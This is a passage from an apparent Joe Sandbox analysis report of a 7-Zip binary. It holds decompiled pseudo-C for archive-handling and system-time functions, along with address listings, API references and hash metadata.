						if( *(_t317 + 0x38) != _t305) {
							 *(_t319 - 0x1c) = 1;
							L0046B8F4(_t319 - 0x1c, 0x47e128);
						}
						E00428B61(_t319 - 0x6c);
						_t247 = 1;
						_push(_t319 - 0x74);
						 *(_t319 - 4) = _t305;
						 *(_t319 - 0x54) = _t247;
						 *(_t319 - 0x50) = _t247;
						 *((intOrPtr*)(_t319 - 0x74)) = 0x6f10701;
						 *(_t319 - 0x70) = _t305;
						E00428BB4(_t317 + 0x1c);
						_t225 = _t247;
						_push(_t225);
						_t226 = _t247;
						_push(_t226);
						L0042389F(_t317 + 0x58);
						E00415C6D(_t317 + 0x80, _t305);
						E00415C6D(_t317 + 0x94, _t305);
						 *(_t319 - 0x6c) = 0x47b178;
						 *(_t319 - 0x1c) = _t319 - 0x6c;
						 *(_t319 - 4) = _t247;
						E0040862D();
						 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
						E00408604(_t319 - 0x6c);
					}
					L70:
					_t240 =  *(_t317 + 0x24) - 1;
					if(_t240 >= 0) {
						_t309 = _t317 + 0xfc;
						do {
							L0042389F(_t309,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t240 * 4)))),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t317 + 0x28)) + _t240 * 4)) + 4)));
							_t240 = _t240 - 1;
						} while (_t240 >= 0);
					}
					_push(0xa8);
					_t258 = L004079F2();
					 *(_t319 - 0x1c) = _t258;
					_t330 = _t258;
					 *(_t319 - 4) = 4;
					if(_t258 == 0) {
						_t166 = 0;
						__eflags = 0;
					} else {
						_push(_t317 + 0x58);
						_t166 = L004233F8(_t258, _t330);
					}
					 *(_t319 - 4) =  *(_t319 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t317 + 0xf8)) = _t166;
					L00423685(_t166, _t317 + 0xa8);
					 *((char*)(_t317 + 0x110)) = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t319 - 0xc));
				return 0;
			}























































                                                                                                                                    0x004285b2
                                                                                                                                    0x004285bc
                                                                                                                                    0x004285bf
                                                                                                                                    0x004285c8
                                                                                                                                    0x004285ce
                                                                                                                                    0x004285d3
                                                                                                                                    0x00428687
                                                                                                                                    0x00428689
                                                                                                                                    0x0042868c
                                                                                                                                    0x0042868f
                                                                                                                                    0x00428692
                                                                                                                                    0x00428698
                                                                                                                                    0x0042869b
                                                                                                                                    0x0042869e
                                                                                                                                    0x004286a2
                                                                                                                                    0x004286a5
                                                                                                                                    0x004286a8
                                                                                                                                    0x004286ab
                                                                                                                                    0x004286ae
                                                                                                                                    0x004286b1
                                                                                                                                    0x004286b3
                                                                                                                                    0x004286c8
                                                                                                                                    0x004286d2
                                                                                                                                    0x004286dd
                                                                                                                                    0x004286e0
                                                                                                                                    0x004286b5
                                                                                                                                    0x004286c1
                                                                                                                                    0x004286c1
                                                                                                                                    0x004286e4
                                                                                                                                    0x004286e5
                                                                                                                                    0x004286e7
                                                                                                                                    0x004286ea
                                                                                                                                    0x004286ec
                                                                                                                                    0x004286fb
                                                                                                                                    0x00428700
                                                                                                                                    0x00428703
                                                                                                                                    0x00428703
                                                                                                                                    0x004286ec
                                                                                                                                    0x004286ea
                                                                                                                                    0x00428708
                                                                                                                                    0x0042870b
                                                                                                                                    0x00428713
                                                                                                                                    0x00428718
                                                                                                                                    0x0042871b
                                                                                                                                    0x0042871e
                                                                                                                                    0x0042871e
                                                                                                                                    0x00428727
                                                                                                                                    0x00428727
                                                                                                                                    0x00428727
                                                                                                                                    0x00428729
                                                                                                                                    0x0042872c
                                                                                                                                    0x0042872e
                                                                                                                                    0x00428734
                                                                                                                                    0x00428738
                                                                                                                                    0x0042873a
                                                                                                                                    0x0042873c
                                                                                                                                    0x0042873c
                                                                                                                                    0x0042873c
                                                                                                                                    0x00428740
                                                                                                                                    0x00428743
                                                                                                                                    0x00428745
                                                                                                                                    0x00428748
                                                                                                                                    0x0042874a
                                                                                                                                    0x0042874c
                                                                                                                                    0x0042874e
                                                                                                                                    0x00428751
                                                                                                                                    0x00428751
                                                                                                                                    0x00428753
                                                                                                                                    0x00428756
                                                                                                                                    0x00428756
                                                                                                                                    0x00428756
                                                                                                                                    0x00428751
                                                                                                                                    0x0042875c
                                                                                                                                    0x0042875f
                                                                                                                                    0x00428761
                                                                                                                                    0x00428763
                                                                                                                                    0x00428765
                                                                                                                                    0x0042876a
                                                                                                                                    0x0042876a
                                                                                                                                    0x0042876d
                                                                                                                                    0x0042876d
                                                                                                                                    0x0042876f
                                                                                                                                    0x00428772
                                                                                                                                    0x00428772
                                                                                                                                    0x00428772
                                                                                                                                    0x0042876d
                                                                                                                                    0x0042877f
                                                                                                                                    0x00428784
                                                                                                                                    0x0042878a
                                                                                                                                    0x0042878e
                                                                                                                                    0x0042878e
                                                                                                                                    0x00428740
                                                                                                                                    0x00428793
                                                                                                                                    0x00428795
                                                                                                                                    0x00428798
                                                                                                                                    0x0042879a
                                                                                                                                    0x0042879a
                                                                                                                                    0x0042879d
                                                                                                                                    0x0042879f
                                                                                                                                    0x004287a1
                                                                                                                                    0x004287b5
                                                                                                                                    0x004287b5
                                                                                                                                    0x004287b5
                                                                                                                                    0x004287a3
                                                                                                                                    0x004287a6
                                                                                                                                    0x004287a6
                                                                                                                                    0x004287a9
                                                                                                                                    0x004287a9
                                                                                                                                    0x004287ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004287ad
                                                                                                                                    0x004287ae
                                                                                                                                    0x004287b1
                                                                                                                                    0x004287b3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004287b3
                                                                                                                                    0x004287a9
                                                                                                                                    0x004287b8
                                                                                                                                    0x004287b8
                                                                                                                                    0x004287bb
                                                                                                                                    0x004287c4
                                                                                                                                    0x004287c4
                                                                                                                                    0x004287c9
                                                                                                                                    0x004287ca
                                                                                                                                    0x004287ca
                                                                                                                                    0x0042879a
                                                                                                                                    0x00428798
                                                                                                                                    0x004287cf
                                                                                                                                    0x004287d1
                                                                                                                                    0x004287d4
                                                                                                                                    0x004287d6
                                                                                                                                    0x004287d6
                                                                                                                                    0x004287d9
                                                                                                                                    0x004287db
                                                                                                                                    0x004287dd
                                                                                                                                    0x004287ee
                                                                                                                                    0x004287ee
                                                                                                                                    0x004287ee
                                                                                                                                    0x004287df
                                                                                                                                    0x004287df
                                                                                                                                    0x004287e2
                                                                                                                                    0x004287e2
                                                                                                                                    0x004287e4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004287e6
                                                                                                                                    0x004287e7
                                                                                                                                    0x004287ea
                                                                                                                                    0x004287ec
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004287ec
                                                                                                                                    0x004287e2
                                                                                                                                    0x004287f1
                                                                                                                                    0x004287f1
                                                                                                                                    0x004287f4
                                                                                                                                    0x004287fd
                                                                                                                                    0x004287fd
                                                                                                                                    0x00428802
                                                                                                                                    0x00428803
                                                                                                                                    0x00428803
                                                                                                                                    0x004287d6
                                                                                                                                    0x00428808
                                                                                                                                    0x0042880f
                                                                                                                                    0x0042881a
                                                                                                                                    0x00428821
                                                                                                                                    0x00428821
                                                                                                                                    0x0042882c
                                                                                                                                    0x0042882e
                                                                                                                                    0x0042883a
                                                                                                                                    0x0042883f
                                                                                                                                    0x00428842
                                                                                                                                    0x00428844
                                                                                                                                    0x00428846
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042884b
                                                                                                                                    0x0042884b
                                                                                                                                    0x0042884e
                                                                                                                                    0x0042884e
                                                                                                                                    0x00428850
                                                                                                                                    0x00428853
                                                                                                                                    0x00428853
                                                                                                                                    0x00428853
                                                                                                                                    0x00428856
                                                                                                                                    0x00428856
                                                                                                                                    0x00428859
                                                                                                                                    0x0042885b
                                                                                                                                    0x0042885d
                                                                                                                                    0x00428871
                                                                                                                                    0x00428871
                                                                                                                                    0x00428871
                                                                                                                                    0x0042885f
                                                                                                                                    0x00428862
                                                                                                                                    0x00428862
                                                                                                                                    0x00428865
                                                                                                                                    0x00428865
                                                                                                                                    0x00428867
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00428869
                                                                                                                                    0x0042886a
                                                                                                                                    0x0042886d
                                                                                                                                    0x0042886f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042886f
                                                                                                                                    0x00428880
                                                                                                                                    0x00428880
                                                                                                                                    0x00428874
                                                                                                                                    0x00428874
                                                                                                                                    0x00428876
                                                                                                                                    0x0042887b
                                                                                                                                    0x00000000
                                                                                                                                    0x0042887b
                                                                                                                                    0x00428884
                                                                                                                                    0x0042888a
                                                                                                                                    0x0042888c
                                                                                                                                    0x0042888e
                                                                                                                                    0x00428890
                                                                                                                                    0x00428896
                                                                                                                                    0x00428896
                                                                                                                                    0x00428898
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0042889a
                                                                                                                                    0x0042889b
                                                                                                                                    0x0042889e
                                                                                                                                    0x004288a0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004288a2
                                                                                                                                    0x00000000
                                                                                                                                    0x004288a0
                                                                                                                                    0x004288aa
                                                                                                                                    0x004288b5
                                                                                                                                    0x004288bc
                                                                                                                                    0x004288c4
                                                                                                                                    0x004288c4
                                                                                                                                    0x004288c6
                                                                                                                                    0x004288c6
                                                                                                                                    0x004288ca
                                                                                                                                    0x004288d0
                                                                                                                                    0x004288d6
                                                                                                                                    0x004288d8
                                                                                                                                    0x004288da
                                                                                                                                    0x004288dd
                                                                                                                                    0x004288df
                                                                                                                                    0x004288f1
                                                                                                                                    0x004288f6
                                                                                                                                    0x004288f7
                                                                                                                                    0x004288f7
                                                                                                                                    0x004288df
                                                                                                                                    0x00428901
                                                                                                                                    0x00428906
                                                                                                                                    0x00428908
                                                                                                                                    0x0042890a
                                                                                                                                    0x00428918
                                                                                                                                    0x0042891b
                                                                                                                                    0x00428920
                                                                                                                                    0x00428925
                                                                                                                                    0x0042892a
                                                                                                                                    0x0042892e
                                                                                                                                    0x00428932
                                                                                                                                    0x00428935
                                                                                                                                    0x0042893b
                                                                                                                                    0x00428942
                                                                                                                                    0x00428943
                                                                                                                                    0x0042894a
                                                                                                                                    0x00428954
                                                                                                                                    0x00428957
                                                                                                                                    0x00428968
                                                                                                                                    0x0042896d
                                                                                                                                    0x00428973
                                                                                                                                    0x0042897a
                                                                                                                                    0x0042897f
                                                                                                                                    0x00428986
                                                                                                                                    0x0042898b
                                                                                                                                    0x0042898c
                                                                                                                                    0x0042898c
                                                                                                                                    0x0042891b
                                                                                                                                    0x0042890a
                                                                                                                                    0x00000000
                                                                                                                                    0x004288ca
                                                                                                                                    0x004285d9
                                                                                                                                    0x004285dd
                                                                                                                                    0x004285e8
                                                                                                                                    0x004285ef
                                                                                                                                    0x004285ef
                                                                                                                                    0x004285f7
                                                                                                                                    0x00428602
                                                                                                                                    0x00428609
                                                                                                                                    0x00428609
                                                                                                                                    0x00428611
                                                                                                                                    0x0042861b
                                                                                                                                    0x0042861f
                                                                                                                                    0x00428620
                                                                                                                                    0x00428623
                                                                                                                                    0x00428626
                                                                                                                                    0x00428629
                                                                                                                                    0x00428630
                                                                                                                                    0x00428633
                                                                                                                                    0x0042863c
                                                                                                                                    0x0042863d
                                                                                                                                    0x0042863f
                                                                                                                                    0x00428640
                                                                                                                                    0x00428641
                                                                                                                                    0x0042864d
                                                                                                                                    0x00428659
                                                                                                                                    0x00428661
                                                                                                                                    0x00428668
                                                                                                                                    0x0042866e
                                                                                                                                    0x00428671
                                                                                                                                    0x00428676
                                                                                                                                    0x0042867d
                                                                                                                                    0x0042867d
                                                                                                                                    0x00428991
                                                                                                                                    0x00428994
                                                                                                                                    0x00428997
                                                                                                                                    0x00428999
                                                                                                                                    0x0042899f
                                                                                                                                    0x004289ac
                                                                                                                                    0x004289b1
                                                                                                                                    0x004289b1
                                                                                                                                    0x0042899f
                                                                                                                                    0x004289b4
                                                                                                                                    0x004289bf
                                                                                                                                    0x004289c1
                                                                                                                                    0x004289c4
                                                                                                                                    0x004289c6
                                                                                                                                    0x004289cd
                                                                                                                                    0x004289da
                                                                                                                                    0x004289da
                                                                                                                                    0x004289cf
                                                                                                                                    0x004289d2
                                                                                                                                    0x004289d3
                                                                                                                                    0x004289d3
                                                                                                                                    0x004289dc
                                                                                                                                    0x004289e9
                                                                                                                                    0x004289ef
                                                                                                                                    0x004289f4
                                                                                                                                    0x004289f4
                                                                                                                                    0x00428a03
                                                                                                                                    0x00428a0b

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004285B2
                                                                                                                                      • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionH_prologRaise
                                                                                                                                    • String ID: -B
                                                                                                                                    • API String ID: 3968804221-1556737743
                                                                                                                                    • Opcode ID: 404979c9329ccc32300473969f7cf993d8275f91a80bc555bb302e10efdc8e91
                                                                                                                                    • Instruction ID: 497342fa4ed3f4b9ebe93b95b60b4c65b54af6a842b733f80198680210375e09
                                                                                                                                    • Opcode Fuzzy Hash: 404979c9329ccc32300473969f7cf993d8275f91a80bc555bb302e10efdc8e91
                                                                                                                                    • Instruction Fuzzy Hash: FCE1F271A007158FDB24DFAAD981BAFB3F5FF84304FA0451EE056A7281DB38A941CB18
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040C756 Relevance: 3.0, APIs: 2, Instructions: 15timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040C756(struct _FILETIME* __ecx) {
				struct _SYSTEMTIME _v20;
				struct _FILETIME* _t7;

				_t7 = __ecx;
				GetSystemTime( &_v20);
				return SystemTimeToFileTime( &_v20, _t7);
			}





                                                                                                                                    0x0040c760
                                                                                                                                    0x0040c763
                                                                                                                                    0x0040c776

                                                                                                                                    APIs
                                                                                                                                    • GetSystemTime.KERNEL32(?,?,?,00000000,00000000,00490AB0), ref: 0040C763
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040C76E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$System$File
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2838179519-0
                                                                                                                                    • Opcode ID: f99081a57e20e77144345343434b143621f6c0873b93853711f5c94f6b142cd8
                                                                                                                                    • Instruction ID: 3ee87ebca316f74d42706c1ab11f39572f018b02ddf3dd2ab21967cb3d1fbd11
                                                                                                                                    • Opcode Fuzzy Hash: f99081a57e20e77144345343434b143621f6c0873b93853711f5c94f6b142cd8
                                                                                                                                    • Instruction Fuzzy Hash: 95D0C972810129AB9B00ABA89C0D8EF7BACEA49114B840866A555D3041E6B0E51487E5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00434D28 Relevance: 2.5, APIs: 1, Instructions: 999COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E00434D28() {
				signed int _t538;
				signed int _t539;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t548;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				signed int _t565;
				signed int _t569;
				signed int _t570;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t589;
				signed int _t598;
				signed int _t602;
				signed int _t627;
				signed int _t631;
				signed int _t636;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t655;
				signed int _t657;
				signed int _t661;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				signed int _t667;
				signed int _t674;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed char _t691;
				signed char _t692;
				intOrPtr* _t694;
				signed int _t696;
				signed int _t698;
				signed int _t701;
				signed int _t703;
				signed int _t706;
				signed int _t712;
				signed int _t717;
				void* _t723;
				signed int _t727;
				signed int _t734;
				signed int _t742;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t768;
				intOrPtr* _t775;
				intOrPtr _t776;
				signed int _t777;
				void* _t779;
				signed int _t781;
				signed int _t783;
				signed int _t787;
				signed int* _t801;
				signed int _t807;
				intOrPtr _t833;
				signed int _t836;
				signed int _t840;
				signed int _t872;
				signed int _t876;
				signed int _t880;
				signed char _t890;
				intOrPtr _t909;
				signed int _t925;
				signed int _t926;
				signed int _t935;
				intOrPtr _t938;
				signed int _t939;
				intOrPtr* _t940;
				intOrPtr* _t941;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t949;
				intOrPtr _t950;
				intOrPtr* _t952;
				intOrPtr _t954;
				intOrPtr _t956;
				intOrPtr _t958;
				void* _t959;
				void* _t961;

				L0046B890(0x477da9, _t959);
				_t935 = 0;
				 *((intOrPtr*)(_t959 - 0x10)) = _t961 - 0x98;
				 *(_t959 - 4) = 0;
				 *((char*)(_t959 - 0x21)) =  *((intOrPtr*)(_t959 + 0x10)) == 0xffffffff;
				if( *((char*)(_t959 - 0x21)) != 0) {
					 *((intOrPtr*)(_t959 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t959 + 8)) + 0x24));
				}
				if( *((intOrPtr*)(_t959 + 0x10)) == _t935) {
					L205:
					_t538 = 0;
					goto L41;
				} else {
					 *(_t959 - 0x3c) = _t935;
					 *(_t959 - 0x38) = _t935;
					 *(_t959 + 0x14) = 0xfffffffe;
					 *(_t959 - 0x90) =  *(_t959 + 0x14) != _t935;
					_t539 = 0;
					while(1) {
						 *(_t959 - 0x44) = _t539;
						if(_t539 >=  *((intOrPtr*)(_t959 + 0x10))) {
							break;
						}
						if( *((char*)(_t959 - 0x21)) == 0) {
							_t539 =  *( *((intOrPtr*)(_t959 + 0xc)) + _t539 * 4);
						}
						_t909 =  *((intOrPtr*)(_t959 + 8));
						_t765 =  *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8;
						_t958 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t909 + 0x14)) +  *( *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8) * 4)) + 0x70)) + ( *((intOrPtr*)(_t909 + 0x28)) + _t539 * 8)[1] * 4));
						if(( *(_t958 + 0x1c) >> 0x00000004 & 0x00000001) == 0) {
							_t768 = E00434147( *((intOrPtr*)(_t959 + 8)) + 8, _t765);
							if(_t768 !=  *(_t959 + 0x14)) {
								 *(_t959 - 0x3c) =  *(_t959 - 0x3c) + _t935;
								asm("adc [ebp-0x38], ebx");
							}
							 *(_t959 + 0x14) = _t768;
							_t935 =  *((intOrPtr*)(_t958 + 0x10)) +  *((intOrPtr*)(_t958 + 0xc));
							asm("adc ebx, ecx");
						}
						_t539 =  *(_t959 - 0x44) + 1;
					}
					 *(_t959 - 0x3c) =  *(_t959 - 0x3c) + _t935;
					asm("adc [ebp-0x38], ebx");
					_t775 =  *((intOrPtr*)(_t959 + 0x18));
					 *((intOrPtr*)( *_t775 + 0xc))(_t775,  *(_t959 - 0x3c),  *(_t959 - 0x38));
					_push(0x38);
					 *(_t959 - 0x3c) = 0;
					 *(_t959 - 0x38) = 0;
					 *((intOrPtr*)(_t959 - 0x8c)) = 0;
					 *((intOrPtr*)(_t959 - 0x88)) = 0;
					_t787 = L004079F2();
					 *(_t959 + 0x14) = _t787;
					__eflags = _t787;
					 *(_t959 - 4) = 1;
					if(_t787 == 0) {
						_t945 = 0;
						__eflags = 0;
					} else {
						_t945 = L0040F3E5(_t787);
					}
					 *(_t959 - 4) =  *(_t959 - 4) & 0x00000000;
					__eflags = _t945;
					 *(_t959 - 0x98) = _t945;
					 *(_t959 - 0x2c) = _t945;
					if(_t945 != 0) {
						 *((intOrPtr*)( *_t945 + 4))(_t945);
					}
					_push(0);
					 *(_t959 - 4) = 2;
					L0040F478(_t945, _t775);
					_push(0x18);
					_t544 = L004079F2();
					__eflags = _t544;
					if(_t544 == 0) {
						_t544 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t544 + 4)) = 0x47b080;
						 *((intOrPtr*)(_t544 + 8)) = 0;
						 *((intOrPtr*)(_t544 + 0x10)) = 0;
						 *((intOrPtr*)(_t544 + 0xc)) = 0;
						 *((intOrPtr*)(_t544 + 0x14)) = 0;
						 *_t544 = 0x47b070;
						 *((intOrPtr*)(_t544 + 4)) = 0x47b060;
					}
					__eflags = _t544;
					 *(_t959 - 0x28) = _t544;
					if(_t544 != 0) {
						 *((intOrPtr*)( *_t544 + 4))(_t544);
					}
					 *(_t959 - 0x94) = 0;
					 *(_t959 - 0x20) = 0;
					 *(_t959 - 0x58) = 0;
					 *(_t959 - 0x1c) = 0;
					 *(_t959 - 0x5c) = 0;
					 *(_t959 - 0x18) = 0;
					_push(0x24);
					 *(_t959 - 4) = 6;
					_t545 = L004079F2();
					 *(_t959 + 0x14) = _t545;
					__eflags = _t545;
					 *(_t959 - 4) = 7;
					if(_t545 == 0) {
						_t946 = 0;
						__eflags = 0;
					} else {
						_t946 = E00435A6A(_t545);
					}
					__eflags = _t946;
					 *(_t959 - 0x50) = _t946;
					 *(_t959 - 4) = 6;
					 *(_t959 - 0x14) = _t946;
					if(_t946 != 0) {
						 *((intOrPtr*)( *_t946 + 4))(_t946);
					}
					 *(_t959 - 4) = 8;
					_t546 = L004339CC(_t946);
					__eflags = _t546;
					if(_t546 != 0) {
						E00404AD0(_t959 - 0x84, 1);
						 *((intOrPtr*)(_t959 - 0x84)) = 0x47ab08;
						 *(_t959 - 4) = 9;
						 *(_t959 - 0x44) = 0;
						while(1) {
							L43:
							_t548 =  *(_t959 - 0x44);
							__eflags = _t548 -  *((intOrPtr*)(_t959 + 0x10));
							if(_t548 >=  *((intOrPtr*)(_t959 + 0x10))) {
								break;
							}
							__eflags =  *((char*)(_t959 - 0x21));
							if( *((char*)(_t959 - 0x21)) == 0) {
								_t947 =  *( *((intOrPtr*)(_t959 + 0xc)) +  *(_t959 - 0x44) * 4);
							} else {
								_t947 = _t548;
							}
							_t938 =  *((intOrPtr*)(_t959 + 8));
							 *(_t959 - 0x44) =  *(_t959 - 0x44) + 1;
							_t801 =  *((intOrPtr*)(_t938 + 0x28)) + _t947 * 8;
							 *(_t959 - 0xa0) = _t801;
							_t776 =  *((intOrPtr*)( *((intOrPtr*)(_t938 + 0x14)) +  *_t801 * 4));
							_t560 =  *( *((intOrPtr*)(_t776 + 0x70)) + _t801[1] * 4);
							 *(_t959 - 0x48) = _t560;
							_t562 =  *(_t560 + 0x1c) >> 4;
							__eflags = _t562 & 0x00000001;
							if((_t562 & 0x00000001) == 0) {
								_t563 = E00434147(_t938 + 8, _t801);
								__eflags = _t563;
								 *(_t959 - 0x54) = _t563;
								if(_t563 >= 0) {
									_t565 =  *( *((intOrPtr*)(_t938 + 0x50)) +  *(_t959 - 0x54) * 4);
									 *(_t959 - 0x60) = _t565;
									 *(_t959 + 0x14) = _t565;
									E0040862D();
									while(1) {
										__eflags =  *(_t959 + 0x14) - _t947;
										if( *(_t959 + 0x14) >= _t947) {
											break;
										}
										L0043AC2F(_t959 - 0x84, 0);
										 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
									}
									L0043AC2F(_t959 - 0x84, 1);
									 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
									_t569 =  *((intOrPtr*)( *(_t959 - 0x48) + 0x10)) +  *((intOrPtr*)( *(_t959 - 0x48) + 0xc));
									__eflags = _t569;
									asm("adc ecx, esi");
									 *(_t959 - 0x68) = _t569;
									 *((intOrPtr*)(_t959 - 0x64)) = 0;
									while(1) {
										_t570 =  *(_t959 - 0x44);
										__eflags = _t570 -  *((intOrPtr*)(_t959 + 0x10));
										if(_t570 >=  *((intOrPtr*)(_t959 + 0x10))) {
											break;
										}
										__eflags =  *((char*)(_t959 - 0x21));
										if( *((char*)(_t959 - 0x21)) == 0) {
											_t570 =  *( *((intOrPtr*)(_t959 + 0xc)) + _t570 * 4);
										}
										 *(_t959 - 0x4c) = _t570;
										_t722 =  *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8;
										_t956 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t938 + 0x14)) +  *( *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8) * 4)) + 0x70)) + ( *((intOrPtr*)(_t938 + 0x28)) +  *(_t959 - 0x4c) * 8)[1] * 4));
										_t890 =  *(_t956 + 0x1c) >> 4;
										__eflags = _t890 & 0x00000001;
										if((_t890 & 0x00000001) != 0) {
											L90:
											 *(_t959 - 0x44) =  *(_t959 - 0x44) + 1;
											continue;
										} else {
											_t723 = E00434147(_t938 + 8, _t722);
											__eflags = _t723 -  *(_t959 - 0x54);
											if(_t723 !=  *(_t959 - 0x54)) {
												break;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags =  *(_t959 + 0x14) -  *(_t959 - 0x4c);
												if( *(_t959 + 0x14) >=  *(_t959 - 0x4c)) {
													break;
												}
												L0043AC2F(_t959 - 0x84, 0);
												 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
											}
											L0043AC2F(_t959 - 0x84, 1);
											 *(_t959 + 0x14) =  *(_t959 + 0x14) + 1;
											_t727 =  *((intOrPtr*)(_t956 + 0x10)) +  *((intOrPtr*)(_t956 + 0xc));
											__eflags = _t727;
											asm("adc ecx, esi");
											 *(_t959 - 0x68) = _t727;
											 *((intOrPtr*)(_t959 - 0x64)) = 0;
											goto L90;
										}
									}
									_t807 =  *(_t959 - 0x98);
									 *(_t807 + 0x28) =  *(_t959 - 0x3c);
									 *(_t807 + 0x2c) =  *(_t959 - 0x38);
									 *((intOrPtr*)(_t807 + 0x20)) =  *((intOrPtr*)(_t959 - 0x8c));
									 *((intOrPtr*)(_t807 + 0x24)) =  *((intOrPtr*)(_t959 - 0x88));
									_t949 = L0040F554(_t807);
									__eflags = _t949;
									if(_t949 != 0) {
										goto L52;
									}
									_push(0x50);
									_t589 = L004079F2();
									__eflags = _t589;
									if(_t589 == 0) {
										_t939 = 0;
										__eflags = 0;
									} else {
										_t939 = _t589;
										 *((intOrPtr*)(_t589 + 4)) = 0;
										 *((intOrPtr*)(_t589 + 0x10)) = 0;
										 *((intOrPtr*)(_t589 + 0x2c)) = 0;
										 *((intOrPtr*)(_t589 + 0x34)) = 0;
